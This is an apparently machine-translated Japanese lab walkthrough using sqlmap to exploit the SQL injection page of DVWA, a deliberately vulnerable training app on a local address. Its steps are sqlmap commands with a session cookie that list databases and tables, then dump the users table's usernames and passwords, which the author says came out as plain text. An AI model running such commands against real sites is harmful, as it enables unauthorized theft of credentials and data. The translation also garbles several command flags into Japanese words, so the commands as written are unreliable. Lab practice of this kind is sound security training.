【SQLmap】DVWA-SQLインジェクション(低)



Sqlmap Dvwa Sql Injection Low



①sqlmapディレクトリに入り、使用する-uアドレスにアクセスするコマンド:

python sqlmap.py -u'http://192.168.133.128/dvwa/vulnerabilities/sqli/?id = 1&Submit = Submit# '



302へのジャンプを見つけ、リダイレクトされたため、これは機能しません...



ブラウザページに戻ってリクエストを確認しましたが、Cookieがあることがわかりました。Cookieを追加します。

②使用 - クッキー対応する低レベルのCookieを使用してコマンドを実行し、再実行してください。おびえたので尋ねられたので、便利さのために、そして - バッチコマンド、あなたは自動的に質問に答えることができます:

python sqlmap.py -u'http://192.168.133.128/dvwa/vulnerabilities/sqli/?id = 1&Submit = Submit# '--cookie'security = low PHPSESSID = 5tnrugc0q5gfbjejbmcr97rgj5' --batch



成功を実行します。

③次に、データベースについて実行し、--dbsコマンド:

python sqlmap.py -u'http://192.168.133.128/dvwa/vulnerabilities/sqli/?id = 1&Submit = Submit# '--cookie'security = low PHPSESSID = 5tnrugc0q5gfbjejbmcr97rgj5' --batch --dbs


8つのデータベースがあることがわかります。

④それなら使えます-Dcommandデータベースを指定します。-テーブルすべてのテーブルの場所を確認するコマンド

python sqlmap.py -u'http://192.168.133.128/dvwa/vulnerabilities/sqli/?id = 1&Submit = Submit# '--cookie'security = low PHPSESSID = 5tnrugc0q5gfbjejbmcr97rgj5' --batch -D dvwa --tables


ああ、2つのテーブルがあります。確かに、ユーザー内のユーザー情報テーブルには明らかです。

⑤と-Tコマンドは、テーブルを指定します。-列テーブルの列を表示するコマンド:

python sqlmap.py -u'http://192.168.133.128/dvwa/vulnerabilities/sqli/?id = 1&Submit = Submit# '--cookie'security = low PHPSESSID = 5tnrugc0q5gfbjejbmcr97rgj5' --batch -D dvwa -T users- -列


目の前の勝利の夜明け。テーブルにフィールドuserとpassword、つまりユーザー名とpasswordがあることがわかります。

⑥最後に、-C必要な列を指定するコマンドは、 - 投げ捨てるここで、コマンドはデータを出力します:

python sqlmap.py -u'http://192.168.133.128/dvwa/vulnerabilities/sqli/?id = 1&Submit = Submit# '--cookie'security = low PHPSESSID = 5tnrugc0q5gfbjejbmcr97rgj5' --batch -D dvwa -T users- Cユーザー、パスワード--dump


OK、ユーザー名とパスワードが表示され、パスワードもプレーンテキストに翻訳されています。